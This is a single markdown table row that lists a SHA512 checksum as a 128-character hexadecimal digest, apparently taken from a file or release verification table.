| SHA512 | 8e6bad55654d867ccef1e76942a99604889d6f38df587114eaabc818b335f9ef6a115e5041fb275f1eedd9c5aeb79b99a35b53f4226fdf6988c1dd4960259db1 |